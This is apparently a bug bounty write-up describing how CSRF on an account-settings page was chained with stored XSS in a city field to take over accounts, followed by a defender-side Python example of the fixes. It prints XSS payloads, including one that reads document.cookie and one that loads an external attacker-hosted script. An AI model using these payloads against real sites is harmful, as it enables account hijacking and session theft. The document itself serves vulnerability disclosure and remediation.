CSRF + Stored XSS Leading to Full Account Takeover

This write-up is about my findings of CSRF + XSS and how I used them together to get a full account takeover. I hope you like it ❤
We always see write-ups / images like this showing CSRF vs. XSS, but have you ever thought of using them together?

Hi boyz, this is my first write-up, so excuse me if there are any mistakes or something missing. My name is Fares Walid and I am a recent full-time bug bounty hunter, Python/Go coder, and interested in malware too xDD
This write-up is about my findings in a private program on HackerOne. I was able to find:
1. CSRF
2. XSS
3. XSS + CSRF = Account Takeover
I hate wasting time, so let's start by calling the affected site target.com

At first I opened the website, registered a new user and tested some functions here and there; then came one of the most important and lovely parts to test for me: the "Account Info/Settings" section.

First I checked changing some details and inspected the requests, and I noticed that there were no headers controlling anything, no CSRF tokens, no security at all!

Quickly I generated a CSRF PoC and tested it:

  1. Then I was able to get the **CSRF**!!

Now I started trying to change the password, and I was really happy because I didn't see any requirement for the current password!! It just requires the new password + confirm password and it's changed!

I tried to use my CSRF to change the password too!
But I faced something not so good here...
There was a CSRF token used in the change-password request.

Now I started testing the other inputs, trying to get an XSS!
Then I noticed something weird when I tried to put " ' ( ) < > and other chars in the inputs!!
But what was it? After I set the city to: **mango"'>**
I noticed the following!

I tried setting the city to: mango"><script>alert(document.cookie)</script>
That's so easy: no encoding, nothing protecting the requests. Here we go.

2. Now I got the XSS along with the first CSRF!! What's next?

I created a quick JS file, uploaded it to my website, then used mango"><script src="my_js_file_url"></script> as the payload!!

What did the file contain?

And boom, I'm fully controlling the account now.
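The chain above works because of three separate defects: the account-settings request has no CSRF token, the city value is written into the page unencoded, and the password change never asks for the current password, so script running in the victim's origin can read the one token that does exist and rotate the password. The following is an added defender-side example, not code from the write-up or from the affected program; it shows the three fixes as small stdlib-only Python handlers. The server secret, session id and form dictionaries are constructed demo values.

```python
import hashlib
import hmac
import html
import secrets

# Constructed demo secret (not from the write-up); a real app loads this from config.
SERVER_SECRET = b"demo-only-secret"
PBKDF2_ROUNDS = 100_000


def csrf_token_for(session_id):
    """Synchronizer-token pattern: the token is an HMAC over the session id, so a
    cross-site page, which cannot read the victim's session, cannot forge it."""
    return hmac.new(SERVER_SECRET, session_id.encode(), hashlib.sha256).hexdigest()


def csrf_valid(session_id, submitted):
    """Constant-time comparison; a missing token is rejected outright, which is the
    check the account-settings endpoint in the write-up lacked."""
    if not submitted:
        return False
    return hmac.compare_digest(csrf_token_for(session_id), submitted)


def render_city(city):
    """Escape the user-controlled city before it lands in HTML, so the
    mango"><script>...</script> value from the write-up becomes inert text."""
    return html.escape(city, quote=True)


def update_profile(session_id, form):
    """Account-settings handler with both fixes: CSRF check plus output encoding."""
    if not csrf_valid(session_id, form.get("csrf_token")):
        return {"status": 403, "error": "missing or invalid CSRF token"}
    return {"status": 200, "city_html": render_city(form.get("city", ""))}


def hash_password(password, salt=None):
    """PBKDF2-HMAC-SHA256 with a random salt; returns (salt, digest)."""
    salt = salt or secrets.token_bytes(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return salt, digest


def password_matches(password, stored):
    """Recompute the digest with the stored salt and compare in constant time."""
    salt, digest = stored
    candidate = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, PBKDF2_ROUNDS)
    return hmac.compare_digest(candidate, digest)


def change_password(session_id, form, stored):
    """Password change requires the CSRF token *and* the current password. Even a
    script already running in the victim's origin cannot rotate the password
    without knowing it, which is what breaks the XSS -> CSRF -> takeover chain.
    Returns (response, stored_credential); the credential is unchanged on failure."""
    if not csrf_valid(session_id, form.get("csrf_token")):
        return {"status": 403, "error": "missing or invalid CSRF token"}, stored
    if not password_matches(form.get("current_password", ""), stored):
        return {"status": 403, "error": "current password incorrect"}, stored
    new, confirm = form.get("password", ""), form.get("confirm_password", "")
    if not new or new != confirm:
        return {"status": 400, "error": "new password and confirmation differ"}, stored
    return {"status": 200}, hash_password(new)


def session_cookie_header(session_id):
    """HttpOnly keeps document.cookie from handing the session to injected script;
    SameSite=Lax withholds the cookie on cross-site POSTs as a second CSRF layer."""
    return f"session={session_id}; Secure; HttpOnly; SameSite=Lax; Path=/"


if __name__ == "__main__":
    sid = "victim-session-id"  # constructed demo session id
    token = csrf_token_for(sid)
    payload = 'mango"><script>alert(document.cookie)</script>'
    print(update_profile(sid, {"city": payload}))                       # 403: no token
    print(update_profile(sid, {"csrf_token": token, "city": payload}))  # 200: escaped city
    creds = hash_password("old-pw")
    resp, creds = change_password(sid, {"csrf_token": token, "password": "x",
                                        "confirm_password": "x"}, creds)
    print(resp)                                                         # 403: no current password
    print(session_cookie_header(sid))
```

Of the three fixes, the current-password requirement is the one that defeats the chain even after an XSS lands: the injected script can read the token from the page, but it cannot read a value the victim only keeps in their head. Output encoding removes the XSS itself, and the token plus SameSite cookie remove the original CSRF on the settings endpoint.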

I hope you like this write-up; as soon as I find something interesting to write about, I'm going to share it :D
Have fun and keep digging ❤

My Twitter

My Github
